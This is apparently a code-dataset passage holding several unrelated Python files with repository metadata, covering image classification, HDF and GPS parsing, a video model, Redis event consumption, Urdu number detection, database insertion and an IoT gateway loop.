        face_crop = cv2.resize(face_crop, (96, 96))
        face_crop = face_crop.astype("float") / 255.0
        face_crop = img_to_array(face_crop)
        face_crop = np.expand_dims(face_crop, axis=0)

        # apply gender detection on the face
        conf = self.model.predict(face_crop)[0]

        # get label with max accuracy
        idx = np.argmax(conf)
        if confidence:
            return conf
        return idx

    def predict_label(self, image_path):
        classes = ['man', 'woman']
        predicted = self.predict(image_path)
        label = classes[predicted]
        return label


if __name__ == "__main__":
    imagePath_same1 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/000/000_1_1.ppm"  # all good
    imagePath_same2 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/001/001_1_1.ppm"  # all good
    imagePath_same3 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/002/002_1_1.ppm"  # spec better (k4 problem)
    imagePath_same4 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/004/004_1_1.ppm"  # spec better than all dist
    imagePath_same5 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/005/005_1_1.ppm"  # spec best
    imagePath_same6 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/006/006_1_1.ppm"
    imagePath_same7 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/007/007_1_1.ppm"  # not good
    imagePath_same8 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/008/008_1_1.ppm"
    imagePath_same9 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/009/009_1_1.ppm"
    imagePath_same10 = "/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/010/010_1_1.ppm"

    model_path = "gender_models/gender_detection_keras.model"
    imagePath = imagePath_same3

    classifier = GenderDetectKeras(model_path)
    predicted = classifier.predict(imagePath)
    print(predicted)
    label = classifier.predict_label(imagePath)
    print("Detected gender is:")
    print(label)
| 33.5 | 117 | 0.659257 | 414 | 3,149 | 4.78744 | 0.335749 | 0.040363 | 0.090817 | 0.110999 | 0.258325 | 0.244198 | 0.221998 | 0.221998 | 0 | 0 | 0 | 0.050778 | 0.224516 | 3,149 | 93 | 118 | 33.860215 | 0.760852 | 0.158463 | 0 | 0 | 0 | 0 | 0.29962 | 0.274525 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.098039 | 0 | 0.235294 | 0.078431 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3775c014edc4cfe9bbf99059dbab03441eae21fe | 3,389 | py | Python | dnppy/convert/_extract_HDF_layer_data.py | NASA-DEVELOP/dnppy | 8f7ef6f0653f5a4ea730ee557c72a2c89c06ce0b | [
"NASA-1.3"
] | 65 | 2015-09-10T12:59:56.000Z | 2022-02-27T22:09:03.000Z | dnppy/convert/_extract_HDF_layer_data.py | snowzm/dnppy | 8f7ef6f0653f5a4ea730ee557c72a2c89c06ce0b | [
"NASA-1.3"
] | 40 | 2015-04-08T19:23:30.000Z | 2015-08-04T15:53:11.000Z | dnppy/convert/_extract_HDF_layer_data.py | snowzm/dnppy | 8f7ef6f0653f5a4ea730ee557c72a2c89c06ce0b | [
"NASA-1.3"
] | 45 | 2015-08-14T19:09:38.000Z | 2022-02-15T18:53:16.000Z | __author__ = ['djjensen', 'jwely']
__all__ = ["_extract_HDF_layer_data"]

import gdal
import os


def _extract_HDF_layer_data(hdfpath, layer_indexs=None):
    """
    Extracts one or more layers from an HDF file and returns a dictionary with
    all the data available in the HDF layer for use in further format conversion
    to better supported formats.

    For example -
        hdfpath = filepath to an hdf file (any HDF 4 or 5 datatype)
        layer_indexs = [1, 2, 3]

    the output dict will have keys:
        ["MasterMetadata", "1", "2", "3"]

    where the "MasterMetadata" values vary widely in format depending on the
    data source, but might contain georeferencing information and the like.
    Each of the values for those integer keys will simply be a gdal.Dataset
    object.

    This function is the first step in the chain for turning HDF data into
    geotiff. The next step is to build an established datatype.

    :param hdfpath:       filepath to any HDF formatted file
    :param layer_indexs:  list of integer index values for layers to extract
    :return out_info:     dict of metadata and gdal.Dataset objects
    """

    # output dict
    out_info = {}
    layer_names = []

    # open the HDF dataset
    hdf_dataset = gdal.Open(hdfpath)
    subdatasets = hdf_dataset.GetSubDatasets()

    # establish layer indices if left default
    if layer_indexs is None:
        layer_indexs = range(len(subdatasets))
    elif isinstance(layer_indexs, int):
        layer_indexs = [layer_indexs]

    # print a summary of the layer content
    print("Contents of {0}".format(os.path.basename(hdfpath)))
    for i, dataset_string in enumerate(subdatasets):
        print("  {0}  {1}".format(i, dataset_string[1]))
        if i in layer_indexs:
            layer_names.append(dataset_string[1])

    # give metadata info for the entire layer
    mdict = hdf_dataset.GetMetadata()
    out_info["MasterMetadata"] = mdict
    # for key in mdict:
    #     print key, " = ", mdict[key]

    # perform operation on each of the desired layers
    for layer in layer_indexs:
        subdataset = gdal.Open(subdatasets[layer][0])
        out_info[layer] = subdataset

    return out_info
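

# Illustrative sketch (not part of the original module): the "next step"
# mentioned in the docstring, writing one extracted layer out as a GeoTIFF.
# This uses only standard GDAL driver calls; the output path is hypothetical.
def _layer_to_geotiff_sketch(hdfpath, layer_index, outpath="layer.tif"):
    layer_data = _extract_HDF_layer_data(hdfpath, layer_index)
    subdataset = layer_data[layer_index]
    driver = gdal.GetDriverByName("GTiff")
    # CreateCopy preserves the subdataset's size, bands and georeferencing
    driver.CreateCopy(outpath, subdataset)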
if __name__ == "__main__":

    # try MODIS
    # rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\MOD09A1.A2015033.h11v05.005.2015044233105.hdf"
    # _extract_HDF_layer_data(rasterpath)

    # try GPM
    rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\3B-HHR-L.MS.MRG.3IMERG.20150401-S233000-E235959.1410.V03E.RT-H5"
    _extract_HDF_layer_data(rasterpath)

    # try TRMM
    # rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\3B42.20140101.00.7.HDF"
    # _extract_HDF_layer_data(rasterpath)

    # try ASTER?
    # rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\AG100.v003.28.-098.0001.h5"
    # _extract_HDF_layer_data(rasterpath)

    # try VIIRS
    # rasterpath = r"C:\Users\jwely\Desktop\troubleshooting\HDF_tests\GDNBO-SVDNB_npp_d20150626_t0132557_e0138361_b18964_c20150626174428799822_noaa_ops.h5"
    # stuff = _extract_HDF_layer_data(rasterpath, [2, 4])
    # print stuff[2].GetProjection()
    # print stuff[2].GetGeoTransform()
    # lat = stuff[2].ReadAsArray()
    # lon = stuff[4].ReadAsArray()
    # print lat[0, 0], lat[0, -1], lat[-1, 0], lat[-1, -1]
    # print lon[0, 0], lon[0, -1], lon[-1, 0], lon[-1, -1]
| 33.89 | 154 | 0.691059 | 475 | 3,389 | 4.764211 | 0.397895 | 0.048608 | 0.046399 | 0.058772 | 0.188688 | 0.175873 | 0.175873 | 0.114892 | 0.114892 | 0 | 0 | 0.06448 | 0.208321 | 3,389 | 99 | 155 | 34.232323 | 0.778979 | 0.594571 | 0 | 0 | 0 | 0.037037 | 0.153907 | 0.106551 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0 | 0.148148 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
377821387853d45c0c5a9841c83920bc6e3f180e | 1,964 | py | Python | network/R2plus1d.py | sabarim/3DC-Seg | 210ee5b9ddebfed7b44c544e2eeb8c3d00e2a7d7 | [
"MIT"
] | 50 | 2020-09-11T07:57:49.000Z | 2022-03-27T06:37:37.000Z | network/R2plus1d.py | sabarim/3DC-Seg | 210ee5b9ddebfed7b44c544e2eeb8c3d00e2a7d7 | [
"MIT"
] | 15 | 2020-09-11T12:54:34.000Z | 2022-01-13T08:38:38.000Z | network/R2plus1d.py | sabarim/3DC-Seg | 210ee5b9ddebfed7b44c544e2eeb8c3d00e2a7d7 | [
"MIT"
] | 12 | 2020-10-01T07:29:53.000Z | 2021-09-18T11:00:49.000Z | import torch
from torch import nn
from torchvision.models.video.resnet import VideoResNet, BasicBlock, Conv2Plus1D, R2Plus1dStem
model_urls = {
"r2plus1d_34_8_ig65m": "https://github.com/moabitcoin/ig65m-pytorch/releases/download/v1.0.0/r2plus1d_34_clip8_ig65m_from_scratch-9bae36ae.pth", # noqa: E501
"r2plus1d_34_32_ig65m": "https://github.com/moabitcoin/ig65m-pytorch/releases/download/v1.0.0/r2plus1d_34_clip32_ig65m_from_scratch-449a7af9.pth", # noqa: E501
"r2plus1d_34_8_kinetics": "https://github.com/moabitcoin/ig65m-pytorch/releases/download/v1.0.0/r2plus1d_34_clip8_ft_kinetics_from_ig65m-0aa0550b.pth", # noqa: E501
"r2plus1d_34_32_kinetics": "https://github.com/moabitcoin/ig65m-pytorch/releases/download/v1.0.0/r2plus1d_34_clip32_ft_kinetics_from_ig65m-ade133f1.pth", # noqa: E501
}
def r2plus1d_34(num_classes, pretrained=False, progress=False, arch=None):
model = VideoResNet(block=BasicBlock,
conv_makers=[Conv2Plus1D] * 4,
layers=[3, 4, 6, 3],
stem=R2Plus1dStem)
model.fc = nn.Linear(model.fc.in_features, out_features=num_classes)
# Fix difference in PyTorch vs Caffe2 architecture
# https://github.com/facebookresearch/VMZ/issues/89
# https://github.com/pytorch/vision/issues/1265
model.layer2[0].conv2[0] = Conv2Plus1D(128, 128, 288)
model.layer3[0].conv2[0] = Conv2Plus1D(256, 256, 576)
model.layer4[0].conv2[0] = Conv2Plus1D(512, 512, 1152)
# We need exact Caffe2 momentum for BatchNorm scaling
for m in model.modules():
if isinstance(m, nn.BatchNorm3d):
m.eps = 1e-3
m.momentum = 0.9
if pretrained:
state_dict = torch.hub.load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict)
model.conv1 = model.stem
return model
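

# Illustrative usage sketch (not part of the original module): building the
# Kinetics-pretrained 8-frame variant and running a dummy clip through it.
# The clip layout (batch, channels, frames, height, width) follows the
# torchvision video-model convention; 400 classes matches Kinetics-400.
if __name__ == "__main__":
    net = r2plus1d_34(num_classes=400, pretrained=True,
                      arch="r2plus1d_34_8_kinetics")
    net.eval()
    clip = torch.randn(1, 3, 8, 112, 112)  # one 8-frame 112x112 RGB clip
    with torch.no_grad():
        logits = net(clip)
    print(logits.shape)  # expected: torch.Size([1, 400])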
| 44.636364 | 171 | 0.682281 | 260 | 1,964 | 4.961538 | 0.4 | 0.069767 | 0.065116 | 0.074419 | 0.293798 | 0.277519 | 0.24186 | 0.24186 | 0.24186 | 0.24186 | 0 | 0.116592 | 0.205193 | 1,964 | 43 | 172 | 45.674419 | 0.709801 | 0.1222 | 0 | 0 | 0 | 0.142857 | 0.330029 | 0.026239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3778b68ea4424c5dd5d977058233e58cf1a45c2c | 2,213 | py | Python | mapillary_tools/gps_parser.py | didier2020/mapillary_tools | 23b8f422559f8dfdabdebc26d0d2001d40fbe2ef | [
"BSD-2-Clause"
] | null | null | null | mapillary_tools/gps_parser.py | didier2020/mapillary_tools | 23b8f422559f8dfdabdebc26d0d2001d40fbe2ef | [
"BSD-2-Clause"
] | null | null | null | mapillary_tools/gps_parser.py | didier2020/mapillary_tools | 23b8f422559f8dfdabdebc26d0d2001d40fbe2ef | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/python
import datetime

from .geo import utc_to_localtime

import gpxpy
import pynmea2

"""
Methods for parsing gps data from various file formats, e.g. GPX, NMEA, SRT.
"""


def get_lat_lon_time_from_gpx(gpx_file, local_time=True):
    """
    Read location and time stamps from a track in a GPX file.

    Returns a list of tuples (time, lat, lon, elevation).

    GPX stores time in UTC; by default we assume your camera used the local
    time and convert accordingly.
    """
    with open(gpx_file, "r") as f:
        gpx = gpxpy.parse(f)

    points = []
    if len(gpx.tracks) > 0:
        for track in gpx.tracks:
            for segment in track.segments:
                for point in segment.points:
                    t = utc_to_localtime(point.time) if local_time else point.time
                    points.append((t, point.latitude, point.longitude, point.elevation))

    if len(gpx.waypoints) > 0:
        for point in gpx.waypoints:
            t = utc_to_localtime(point.time) if local_time else point.time
            points.append((t, point.latitude, point.longitude, point.elevation))

    # sort by time just in case
    points.sort()
    return points


def get_lat_lon_time_from_nmea(nmea_file, local_time=True):
    """
    Read location and time stamps from a track in a NMEA file.

    Returns a list of tuples (time, lat, lon, altitude).

    NMEA stores time in UTC; by default we assume your camera used the local
    time and convert accordingly.
    """
    with open(nmea_file, "r") as f:
        lines = f.readlines()
        lines = [l.rstrip("\n\r") for l in lines]

    # Get the initial date from the first GPRMC sentence
    for l in lines:
        if "GPRMC" in l:
            data = pynmea2.parse(l)
            date = data.datetime.date()
            break

    # Parse GPS trace
    points = []
    for l in lines:
        if "GPRMC" in l:
            data = pynmea2.parse(l)
            date = data.datetime.date()

        if "$GPGGA" in l:
            data = pynmea2.parse(l)
            timestamp = datetime.datetime.combine(date, data.timestamp)
            if local_time:
                # assumed fix: convert the naive UTC timestamp, matching the
                # behaviour of the GPX parser above and this docstring
                timestamp = utc_to_localtime(timestamp)
            lat, lon, alt = data.latitude, data.longitude, data.altitude
            points.append((timestamp, lat, lon, alt))

    points.sort()
    return points
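

# Illustrative usage sketch (not part of the original module); the file path
# is a hypothetical placeholder:
#
#   points = get_lat_lon_time_from_gpx('ride.gpx')
#   for t, lat, lon, elevation in points:
#       print(t, lat, lon, elevation)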
| 27.6625 | 88 | 0.612743 | 316 | 2,213 | 4.21519 | 0.297468 | 0.027027 | 0.031532 | 0.024775 | 0.554054 | 0.554054 | 0.509009 | 0.509009 | 0.509009 | 0.509009 | 0 | 0.003839 | 0.293719 | 2,213 | 79 | 89 | 28.012658 | 0.848369 | 0.219611 | 0 | 0.463415 | 0 | 0 | 0.013863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04878 | false | 0 | 0.097561 | 0 | 0.195122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37795fd108033032ce115714c706b125640ba1c5 | 1,685 | py | Python | src/polyd_events/consumer.py | supernothing/polyd-events | 527dbd4c538253bed9a4096711e1ba4ee32202bf | [
"MIT"
] | null | null | null | src/polyd_events/consumer.py | supernothing/polyd-events | 527dbd4c538253bed9a4096711e1ba4ee32202bf | [
"MIT"
] | null | null | null | src/polyd_events/consumer.py | supernothing/polyd-events | 527dbd4c538253bed9a4096711e1ba4ee32202bf | [
"MIT"
] | null | null | null | import logging
import time

import inflection

from .events import Event, RedisEvent

logger = logging.getLogger(__name__)


class EventConsumer(object):
    def __init__(self, streams, group, consumer_name, db, consume_from_end=False):
        """
        An event consumer.

        :param streams: List of stream names
        :param group: The name of this consumer group
        :param consumer_name: The name of this consumer
        :param db: A walrus DB object
        """
        self.db = db
        self.cg = self.db.consumer_group(group, streams, consumer_name)
        self.cg.create(mkstream=True)
        self.stop = False
        if consume_from_end:
            self.cg.set_id('$')

    def get_events(self, count=1, block=0):
        resp = self.cg.read(count, block)
        if resp:
            for stream, events in resp:
                stream = stream.decode('utf-8')
                for event_id, event in events:
                    event_id = event_id.decode('utf-8')
                    if b'event' not in event:
                        logger.warning('got malformed event: %s', str(event))
                        continue
                    event = event[b'event'].decode('utf-8')
                    yield Event.deserialize(
                        event,
                        RedisEvent(getattr(self.cg, inflection.underscore(stream)), event_id))

    def iter_events(self, count=10, block=None, sleep=0.1):
        while True:
            if self.stop:
                break
            num_events = 0
            for event in self.get_events(count=count, block=block):
                yield event
                num_events += 1
            if not num_events:
                time.sleep(sleep)
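

# Illustrative usage sketch (not part of the original module); the Redis
# connection details and the stream/group/consumer names are hypothetical:
#
#   from walrus import Database
#   db = Database(host='localhost', port=6379)
#   consumer = EventConsumer(['my-stream'], 'my-group', 'consumer-1', db)
#   for event in consumer.iter_events():
#       handle(event)  # 'handle' is a placeholder for application code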
| 31.203704 | 121 | 0.563798 | 206 | 1,685 | 4.480583 | 0.354369 | 0.032503 | 0.032503 | 0.028169 | 0.045504 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009964 | 0.344807 | 1,685 | 53 | 122 | 31.792453 | 0.826087 | 0.106231 | 0 | 0 | 0 | 0 | 0.033793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.114286 | 0 | 0.228571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378287ed5b55d57f24765ff2c9e50d71d392d932 | 3,438 | py | Python | urdu_tts/tts/text_processor/number_strings.py | mhsiddiqui/nlp_with_docker | a44191f2acc4e7cb62bea8bfdff6ffca123613e9 | [
"Apache-2.0"
] | null | null | null | urdu_tts/tts/text_processor/number_strings.py | mhsiddiqui/nlp_with_docker | a44191f2acc4e7cb62bea8bfdff6ffca123613e9 | [
"Apache-2.0"
] | 3 | 2020-06-05T18:09:02.000Z | 2021-06-10T20:06:02.000Z | urdu_tts/tts/text_processor/number_strings.py | mhsiddiqui/nlp_with_docker | a44191f2acc4e7cb62bea8bfdff6ffca123613e9 | [
"Apache-2.0"
] | null | null | null | import csv
import re
import collections

from tts.text_processor import RESOURCE_PATH


class GetStringType(object):
    """
    Get the string type: Date, Time or Number.

    Number formats which are handled are below:
    1. Date (12.12.12 or 12/12/12 or 12-12-12)
    2. Time (12:12:12 or 12:12)
    3. Number (12 or 12.12)
    """

    def __init__(self, text):
        self.text = text

    def get_string_type(self):
        if bool(self._date_strings()):
            return 'Date'
        elif bool(self._time_strings()):
            return 'Time'
        elif bool(self._number_strings()):
            return 'Number'
        else:
            return 'None'

    def _get_all_months(self):
        mapping_dict = {}
        # read the month-name mappings in text mode with utf-8 so csv.reader
        # yields str rows under Python 3 (the original opened in 'rb')
        with open(RESOURCE_PATH + '/month.csv', encoding='utf-8') as f:
            mappings = csv.reader(f)
            for row in mappings:
                mapping_dict.update({row[0]: row[1]})
        return set(mapping_dict.values())

    def _date_strings(self):
        regex_string = r'\d{1,4}[./-]\d{1,4}[./-]\d{1,4}'
        regex = re.compile(regex_string)
        find_string = regex.findall(self.text)
        self.text = re.sub(regex_string, '', self.text)
        find_string += self._text_date()
        return find_string

    def _text_date(self):
        all_months = self._get_all_months()
        text_dates = []
        regex_pattern = r'%s \d{4}'
        for month in all_months:
            comp_regex = regex_pattern % month.replace(' ', '')
            regex = re.compile(comp_regex)
            find_string = regex.findall(self.text)
            if bool(find_string):
                text_dates += find_string
                self.text = re.sub(comp_regex, '', self.text)
        return text_dates

    def _time_strings(self):
        regex_string = r'\d{1,2}:\d{1,2}(?::\d{1,2})?'
        regex = re.compile(regex_string)
        find_string = regex.findall(self.text)
        self.text = re.sub(regex_string, '', self.text)
        return find_string

    def _number_strings(self):
        regex = re.compile(r'(\d+(?:\.\d+)?)')
        return regex.findall(self.text)


class NumberStrings(GetStringType):
    """
    Get all number strings in a string.

    Number formats which are handled are below:
    1. Date (12.12.12 or 12/12/12 or 12-12-12)
    2. Time (12:12:12 or 12:12)
    3. Number (12 or 12.12)
    """

    def __init__(self, text, all_types=True, date_only=False, time_only=False, number_only=False):
        self.all_types = all_types
        self.date_only = date_only
        self.time_only = time_only
        self.number_only = number_only
        super(NumberStrings, self).__init__(text)

    def get_number_strings(self):
        output = collections.OrderedDict()
        if self.all_types:
            output.update({'date': self._date_strings()})
            output.update({'time': self._time_strings()})
            output.update({'number': self._number_strings()})
        else:
            if self.date_only:
                output.update({'date': self._date_strings()})
            if self.time_only:
                output.update({'time': self._time_strings()})
            if self.number_only:
                output.update({'number': self._number_strings()})
        return output
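

# Illustrative usage sketch (not part of the original module). Matches are
# consumed from the text as they are found, so dates are extracted before
# times and plain numbers:
#
#   ns = NumberStrings('meeting on 12-10-2021 at 10:30 costs 250')
#   ns.get_number_strings()
#   # expected roughly:
#   # OrderedDict([('date', ['12-10-2021']), ('time', ['10:30']), ('number', ['250'])])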
| 30.157895 | 98 | 0.559046 | 436 | 3,438 | 4.188073 | 0.192661 | 0.043812 | 0.026287 | 0.035049 | 0.372399 | 0.372399 | 0.215772 | 0.215772 | 0.215772 | 0.215772 | 0 | 0.03838 | 0.317917 | 3,438 | 113 | 99 | 30.424779 | 0.740299 | 0.111402 | 0 | 0.240506 | 0 | 0 | 0.048813 | 0.019726 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113924 | false | 0 | 0.050633 | 0 | 0.316456 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378755b6e4a6d1df5540651db412b6b7152b2607 | 2,055 | py | Python | classes/entities/song.py | Xindictus/Simple-Web-Based-Interface-CRUD | 274fe6aa4e6e2583a04b3bb1a8ba3f9aa213c263 | [
"Apache-2.0"
] | null | null | null | classes/entities/song.py | Xindictus/Simple-Web-Based-Interface-CRUD | 274fe6aa4e6e2583a04b3bb1a8ba3f9aa213c263 | [
"Apache-2.0"
] | null | null | null | classes/entities/song.py | Xindictus/Simple-Web-Based-Interface-CRUD | 274fe6aa4e6e2583a04b3bb1a8ba3f9aa213c263 | [
"Apache-2.0"
] | null | null | null | #!/Python27/python
from ..database.database import Database


# A class used for song insertion
class Song:
    def __init__(self, title, production_year, cd, singer, composer, song_writer):
        self.title = title
        self.production_year = production_year
        self.cd = cd
        self.singer = singer
        self.composer = composer
        self.song_writer = song_writer

    def insert_song(self):
        # get a new database connection
        connection = Database().start_connection()
        try:
            # check for empty fields
            if (self.title == '' or
                    self.production_year == '' or
                    self.cd == '' or
                    self.singer == '' or
                    self.composer == '' or
                    self.song_writer == ''):
                raise Exception('Empty Fields')

            # insert the song with a prepared statement
            with connection.cursor() as cursor:
                song_query = "INSERT INTO `tragoudi` (`titlos`, `sinthetis`, `etos_par`, `stixourgos`) " \
                             "VALUES (%s, %s, %s, %s)"
                cursor.execute(song_query, (self.title, self.composer, self.production_year, self.song_writer))

                sinprod_query = "INSERT INTO `singer_prod` (`cd`, `tragoudistis`, `title`) VALUES (%s, %s, %s)"
                cursor.execute(sinprod_query, (self.cd, self.singer, self.title))

            # commit database changes
            connection.commit()
            # return the class for the alert box and the message to be shown
            return [
                'class="alert alert-success text-center"',
                'Song inserted successfully.'
            ]
        except Exception:
            # on exception, return the class for the alert box and the message to be shown
            return [
                'class="alert alert-danger text-center"',
                'Song could not be inserted.'
            ]
        finally:
            # close the database connection
            Database().close_connection(connection)
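

# Illustrative usage sketch (not part of the original module); the field
# values are hypothetical, and the relative import means this module runs
# as part of the package rather than as a standalone script:
#
#   song = Song('My Title', '1999', 'CD-1', 'Singer', 'Composer', 'Writer')
#   alert_class, message = song.insert_song()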
| 35.431034 | 112 | 0.552798 | 218 | 2,055 | 5.105505 | 0.348624 | 0.040431 | 0.048518 | 0.016173 | 0.156334 | 0.127583 | 0.127583 | 0.127583 | 0.127583 | 0.127583 | 0 | 0.001496 | 0.349392 | 2,055 | 57 | 113 | 36.052632 | 0.830965 | 0.163504 | 0 | 0.054054 | 0 | 0.027027 | 0.18538 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.027027 | 0 | 0.162162 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378979218302d31b75d0e2659058fd19f5495d01 | 1,237 | py | Python | NeoAnalysis_Py3.5/NeoAnalysis/readio/h5_io.py | Research-lab-KUMS/NeoAnalysis | 32b508dfade3069b1ec5cc7664574b8d3f2d5f57 | [
"MIT"
] | 23 | 2017-09-04T13:20:38.000Z | 2022-03-08T08:15:17.000Z | NeoAnalysis_Py3.5/NeoAnalysis/readio/h5_io.py | Research-lab-KUMS/NeoAnalysis | 32b508dfade3069b1ec5cc7664574b8d3f2d5f57 | [
"MIT"
] | 4 | 2018-01-05T13:44:29.000Z | 2021-09-30T17:08:15.000Z | NeoAnalysis_Py2.7/NeoAnalysis/readio/h5_io.py | neoanalysis/NeoAnalysis | c5f25b71e16997f3a05f70b1eead11f99a3b7e2b | [
"MIT"
] | 5 | 2017-11-26T19:40:46.000Z | 2021-03-11T17:25:23.000Z | import h5py as hp
import numpy as np


def h5_io(filename, spike_to_load, analog_to_load):
    spikes = dict()
    analogs = dict()
    events = dict()
    comments = dict()
    # note: dataset.value is the legacy h5py accessor used here;
    # on h5py >= 3 the equivalent is dataset[()]
    with hp.File(filename, 'r') as f:
        for key in f.keys():
            if key == 'events':
                events['times'] = f[key]['times'].value
                events['labels'] = f[key]['labels'].value
            elif key == 'comments':
                comments['times'] = f[key]['times'].value
                comments['labels'] = f[key]['labels'].value
            elif key == 'spikes':
                for tem_key in f[key].keys():
                    if tem_key in spike_to_load:
                        spikes[tem_key] = f[key][tem_key]['times'].value
            elif key == 'analogs':
                for tem_key in f[key].keys():
                    if tem_key in analog_to_load:
                        analogs[tem_key] = dict()
                        analogs[tem_key]['data'] = f[key][tem_key]['data'].value
                        analogs[tem_key]['sampling_rate'] = f[key][tem_key]['sampling_rate'].value
                        analogs[tem_key]['start_time'] = f[key][tem_key]['start_time'].value
    return events, comments, spikes, analogs | 44.178571 | 98 | 0.514956 | 156 | 1,237 | 3.916667 | 0.25641 | 0.12766 | 0.052373 | 0.065466 | 0.248773 | 0.186579 | 0.186579 | 0.094926 | 0.094926 | 0.094926 | 0 | 0.002454 | 0.341148 | 1,237 | 28 | 99 | 44.178571 | 0.747239 | 0 | 0 | 0.071429 | 0 | 0 | 0.105816 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
378a6f60c85208588264fa4b0e5b9304df902135 | 1,601 | py | Python | device_gateway/gateway.py | dastultz/home-automation | 4007dbca43726cdf5949ee2aa1cd4d40ba67b5d3 | [
"MIT"
] | null | null | null | device_gateway/gateway.py | dastultz/home-automation | 4007dbca43726cdf5949ee2aa1cd4d40ba67b5d3 | [
"MIT"
] | null | null | null | device_gateway/gateway.py | dastultz/home-automation | 4007dbca43726cdf5949ee2aa1cd4d40ba67b5d3 | [
"MIT"
] | null | null | null | import time
import network_manager
from components import Heartbeat, LogManager
from message_bus import MessageBus
import logger


class Gateway:
    def __init__(self):
        self._message_bus = MessageBus(self._on_message)
        self._components = []
        self._component_dict = {}

    def add_component(self, component):
        self._components.append(component)
        self._component_dict[component.id] = component
        component.message_bus = self._message_bus

    def run(self):
        self.add_component(Heartbeat())
        self.add_component(LogManager())
        network_manager.connect()
        self._message_bus.connect()
        # report status of all components
        self._report_all()
        print("A1")
        while True:
            try:
                self._message_bus.service()
                for component in self._components:
                    component.service()
                time.sleep(0.01)
            except Exception as exc:
                logger.log("E6 %s" % exc)

    def _on_message(self, component_id, payload):
        report_all = component_id == "*"  # report only, maybe should be ../$SYS/report-all
        is_set = payload is not None
        if report_all:
            self._report_all()
        elif is_set:
            component = self._component_dict[component_id]
            component.set(payload)
        else:
            component = self._component_dict[component_id]
            component.report_state()

    def _report_all(self):
        for component in self._components:
            component.report_state()
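

# Illustrative sketch (not part of the original module): a minimal component
# that the Gateway above could manage. The interface (id, service, set,
# report_state, message_bus) is inferred from how Gateway calls components;
# the Relay name, its payloads, and the publish() call are all assumptions.
class Relay:
    def __init__(self):
        self.id = "relay1"
        self.message_bus = None  # injected by Gateway.add_component()
        self._state = False

    def service(self):
        pass  # nothing to poll for this component

    def set(self, payload):
        self._state = payload == b"on"
        self.report_state()

    def report_state(self):
        if self.message_bus:
            # publish() is an assumed MessageBus method
            self.message_bus.publish(self.id, b"on" if self._state else b"off")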
